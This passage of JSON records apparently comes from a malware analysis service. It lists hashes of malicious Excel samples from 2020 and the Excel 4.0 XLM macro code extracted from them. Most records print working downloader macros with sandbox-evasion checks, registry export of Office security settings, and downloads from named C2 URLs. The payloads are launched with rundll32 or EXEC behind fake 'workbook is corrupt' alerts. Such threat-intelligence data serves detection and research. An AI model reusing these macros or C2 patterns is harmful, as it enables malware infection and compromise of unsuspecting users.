,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-frunt.php\",\"c:\\Users\\Public\\c6wga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://gartnerkvartalet.no/wp-content/themes/calliope/wp-front.php\",\"c:\\Users\\Public\\c6wga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6wga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"I0wy0OFlew\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"43e218f2b85f29501ebafad49792573fc391687cc34132ef549485a509644f5e"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"43e218f2b85f29501ebafad49792573fc391687cc34132ef549485a509644f5e","filesize":168960,"md5":"a5f275b205a6abd10fa819263310c0be","sha1":"c4e3c42500dad1b334342bdc43ed77e79b5ffbaa","sha256":"43e218f2b85f29501ebafad49792573fc391687cc34132ef549485a509644f5e","sha512":"da9dc557cf09ddd10eaf13cf7d9a071cc9fddb6162aea455b90964ad3b95b632517e9f1f71950dd78bddcb9370681a856413beb0628bd6a246d37465ae33c566","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"43e218f2b85f29501ebafad49792573fc391687cc34132ef549485a509644f5e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KNM0Ywcpsy\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"43eae3760329da5b039b1787d5413916b951b2424657758abccb7f4b2e1b478c"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"43eae3760329da5b039b1787d5413916b951b2424657758abccb7f4b2e1b478c","filesize":186368,"md5":"fec2d65101235e05528fe661d44a1480","sha1":"c20893b711d35ce09585cbfac77d056903429b85","sha256":"43eae3760329da5b039b1787d5413916b951b2424657758abccb7f4b2e1b478c","sha512":"7aac7e2ddd331827f64d6e1dcba5d52125ba746f1c206df7e3c24f601ec5687016ca1715e1a73ee9f062b1f9a146fb5f0f5faf847f7812acec0c593d23f465e1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"43eae3760329da5b039b1787d5413916b951b2424657758abccb7f4b2e1b478c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nGET.WORKSPACE(1)\nGET.WORKSPACE(32)\nGET.WINDOW(1)\nIF(GET.WORKSPACE(19),CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,GET.NOTE(R$6C$3),GET.NOTE(R$4C$5),0,0),CLOSE(TRUE))\nIF(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2),EXEC(GET.NOTE(R$11C$4)),)\nCLOSE(TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"43fe43ad82711a19f226e59182bf925d0144b7b8ef33f1652a634dac280d1e93"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"43fe43ad82711a19f226e59182bf925d0144b7b8ef33f1652a634dac280d1e93","filesize":113664,"md5":"348b98d55317ab30bf3f111b75f89ea0","sha1":"79ae903d4cdbfb4605af6527fdf4ed09509910ba","sha256":"43fe43ad82711a19f226e59182bf925d0144b7b8ef33f1652a634dac280d1e93","sha512":"7336eef397772e7f5da5cba97d5c6ca753709d6cd8a5c1e55aa9c04e080f13d42aea65f691967d764605b62efa0a35e81954409689c3c76082cff810183cc8b7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"43fe43ad82711a19f226e59182bf925d0144b7b8ef33f1652a634dac280d1e93.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"wGWpoqLuox\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4402f0893492be3357d8d9d600f9a3c78370ae85bccb02837f2f1bf328d601a2"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"4402f0893492be3357d8d9d600f9a3c78370ae85bccb02837f2f1bf328d601a2","filesize":147968,"md5":"51f4da8d5ddd055991e95255c7e04db7","sha1":"55ecdc8f21d897604b97c987c1129348803cf311","sha256":"4402f0893492be3357d8d9d600f9a3c78370ae85bccb02837f2f1bf328d601a2","sha512":"adca60a84c05d02fb0ef38263fb38ae350e917e197f0b9fefa542ca1c2e5d6ee28d54f9f6573ef4ad70853df5d53328d06a137fe6a1f74456228fa2af8184f11","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4402f0893492be3357d8d9d600f9a3c78370ae85bccb02837f2f1bf328d601a2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"NbILQwm78V\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4410936e830ff62e14ab66fcb815814a89d1790dd81ecaffa06b021219ebacf3"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"4410936e830ff62e14ab66fcb815814a89d1790dd81ecaffa06b021219ebacf3","filesize":185344,"md5":"e25667f7e2e7d571aed2312214f9a591","sha1":"370f21c73258ae072f4d4faa98e4ce71c87a9963","sha256":"4410936e830ff62e14ab66fcb815814a89d1790dd81ecaffa06b021219ebacf3","sha512":"eb307840dc06f8ca99c295c5e3321f7eea1f03362f164fb6bfca0853b7a121f7661db9940256b701ead001d16d745dec7bdd480a499aa7757bfa7af64cf19c5d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4410936e830ff62e14ab66fcb815814a89d1790dd81ecaffa06b021219ebacf3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"441c7c63c8e4e3b50b4e65f4c82e26a972347b565940032c2c37459c5b16e99c"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"441c7c63c8e4e3b50b4e65f4c82e26a972347b565940032c2c37459c5b16e99c","filesize":185344,"md5":"228b5847ce6aeb0b6ce811b7b5ec1aef","sha1":"34618aaa4a822de5b8a90fac84695d63efb304f3","sha256":"441c7c63c8e4e3b50b4e65f4c82e26a972347b565940032c2c37459c5b16e99c","sha512":"8831ca3beca2d8a5ebcd8a40686952e4b2190f39dc0dccc67a5d24cb970b67dc976abf27fbd4c8da56738f82dd87d59f344f39324dc0b52e1a13d1b34a2738ba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"441c7c63c8e4e3b50b4e65f4c82e26a972347b565940032c2c37459c5b16e99c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4421b95d5e5bdcaa833d220a376053ed9e2de4b0bb1febece1c52567aa307833"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"4421b95d5e5bdcaa833d220a376053ed9e2de4b0bb1febece1c52567aa307833","filesize":185344,"md5":"28952d67c8067b5164984365f5b9f2e8","sha1":"ed05198ced604f5f2f495405b8e67fdfc0a60335","sha256":"4421b95d5e5bdcaa833d220a376053ed9e2de4b0bb1febece1c52567aa307833","sha512":"f52f6e05c6c66e6b971e44a7267f397e22342558b46cb47bd21229d839c27b475d47bcce4e5ade4e8cfd0d0f42ee7f5638e4c1a0b85246467881a04492db1584","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4421b95d5e5bdcaa833d220a376053ed9e2de4b0bb1febece1c52567aa307833.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"443173f312338470f7731d10172cba0f08ea22515a1cfd228d6996b059997991"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"443173f312338470f7731d10172cba0f08ea22515a1cfd228d6996b059997991","filesize":206336,"md5":"7e4821d4ce34163a89b346e91be3fe77","sha1":"5fff7fe7a5c804e38b0b499761035bc86c02530d","sha256":"443173f312338470f7731d10172cba0f08ea22515a1cfd228d6996b059997991","sha512":"ef125eaa994b8aaf77047416ef21eb05f245d14205de5f8d1e0a73189568be9c2e6839c5ef85522ccedbbbc922991ecd968c9c2b201885bc039e4233ea94abda","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"443173f312338470f7731d10172cba0f08ea22515a1cfd228d6996b059997991.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"a2sO4M3tq0\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44377806cd586554e815c26ee034754d2e13f8f7ead094f71331ea594dd928d9"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"44377806cd586554e815c26ee034754d2e13f8f7ead094f71331ea594dd928d9","filesize":168448,"md5":"357e93486b14668ae7dbd13c3dd033d4","sha1":"110eb5c70f2dc05e90de1fe4a091b898ad3caa35","sha256":"44377806cd586554e815c26ee034754d2e13f8f7ead094f71331ea594dd928d9","sha512":"00534c348ef33d69472fe87abd9a4660bcb1a0f77c9fd4fa418e04974f73b1c9cbaac93a7a6978ab637dd7c418df9cce6ec72276ee523c797afe091215bec9ac","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44377806cd586554e815c26ee034754d2e13f8f7ead094f71331ea594dd928d9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MMTnt2kwjm\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44409be0bae363c55b5ba43b8d78f608a81f691867bade8ec9371cea2d45cf5e"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"44409be0bae363c55b5ba43b8d78f608a81f691867bade8ec9371cea2d45cf5e","filesize":185344,"md5":"8b19596991d38c4e9f4c49b2e0e0e224","sha1":"84bf63c0530239509dd428df01139240b0bac8b9","sha256":"44409be0bae363c55b5ba43b8d78f608a81f691867bade8ec9371cea2d45cf5e","sha512":"b634a28eb4b2e7113b541c28714aa709d016c02080768a2c275c42f2796f9b25a47c25554c9d6e1c12212b11d65facb177e6736e2875307b4587bb784945b25c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44409be0bae363c55b5ba43b8d78f608a81f691867bade8ec9371cea2d45cf5e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44479943493302a9d544b95e2a7b7a38867a96933ace9430af51320c5fd5ba44"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"44479943493302a9d544b95e2a7b7a38867a96933ace9430af51320c5fd5ba44","filesize":185344,"md5":"3088698446aea1ea343e5ba70db331f5","sha1":"74eb8ab79b1652c56712a62160cb0cec89c8f34a","sha256":"44479943493302a9d544b95e2a7b7a38867a96933ace9430af51320c5fd5ba44","sha512":"ab1e159ebf6fe43898696cda577a873adf296cec01155e8a2041c5c8752370ef7abc5d7e8022d47dba911c82b89b78ba80d7224d38463ad4ccaab280bc2fa39e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44479943493302a9d544b95e2a7b7a38867a96933ace9430af51320c5fd5ba44.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"444b50dfe9b77ed84902e987dffd339518effcd9b01330800abf4853ccef74a6"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"444b50dfe9b77ed84902e987dffd339518effcd9b01330800abf4853ccef74a6","filesize":113664,"md5":"69b43aac6b20b8447be870f781757feb","sha1":"c66063f2950705d1cfe4c74a72e5ccec679cc32f","sha256":"444b50dfe9b77ed84902e987dffd339518effcd9b01330800abf4853ccef74a6","sha512":"cdde78c566623e1b1f2729359cf5ca3ba37f53a1bd816583ca263bc02b0756eb70049a1f84754de6f9e369b8335bb9f609780bcad343012c8597619387840c01","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"444b50dfe9b77ed84902e987dffd339518effcd9b01330800abf4853ccef74a6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eOSPUEgSJI\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"444cff095d3d10ff9bffbec74993ae21914373cf9ab3d2d517ffeaa5d3168841"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"444cff095d3d10ff9bffbec74993ae21914373cf9ab3d2d517ffeaa5d3168841","filesize":206336,"md5":"0731f8e1353eca071a96f49449d6ac03","sha1":"74dd19258c6bca1bfa53e041df28428da1a1da3d","sha256":"444cff095d3d10ff9bffbec74993ae21914373cf9ab3d2d517ffeaa5d3168841","sha512":"306fc6d1a3c8d9b693318691a8ac487d9336056f68a6ac25a4a611060c0c15a40caa0ed87e143124ccb2c5665356eed5115a0f99692ba55c4de415f711d753e1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"444cff095d3d10ff9bffbec74993ae21914373cf9ab3d2d517ffeaa5d3168841.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VBCTGjgdlB\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"444e9cb707b3c7dde39b78d4ae6ae48dc65a9f81b25bad7fdc953a9505883afc"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"444e9cb707b3c7dde39b78d4ae6ae48dc65a9f81b25bad7fdc953a9505883afc","filesize":207360,"md5":"f2ac4de3d920e22a535e0fadba566b06","sha1":"ed23a9caed4342a67bdffdf9ac4f5e054521225a","sha256":"444e9cb707b3c7dde39b78d4ae6ae48dc65a9f81b25bad7fdc953a9505883afc","sha512":"7907b760ac522484a689e566a88bea846784f0ee7e624163d1a26077d87b9720c03ae55f18dd6a3d84a8f5365047c4766ba16ce0e461a0a658a6e7f1e346fd98","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"444e9cb707b3c7dde39b78d4ae6ae48dc65a9f81b25bad7fdc953a9505883afc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-crun.php","https://narensyndicate.com/wp-crun.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-crun.php\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-crun.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RG1BmeYhJ5\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4458c3bc562a3560103a2e0cea562f83e01ab45dde9b9ebb099b6bebef551ede"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"4458c3bc562a3560103a2e0cea562f83e01ab45dde9b9ebb099b6bebef551ede","filesize":185344,"md5":"fadbee672ede3b709c9ab233e8694eef","sha1":"23fe7c34073d15076356d131cdc4fd65d1d3e8df","sha256":"4458c3bc562a3560103a2e0cea562f83e01ab45dde9b9ebb099b6bebef551ede","sha512":"a7fd25bfb78eb339173039cde7cd373aa4a9d1567d81f10a94bb0f2335146bc3640ca37335d4a9f0f458658ce100599ab6cc93fc6bff8ebe1d7b4b3e3668a6f0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4458c3bc562a3560103a2e0cea562f83e01ab45dde9b9ebb099b6bebef551ede.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office 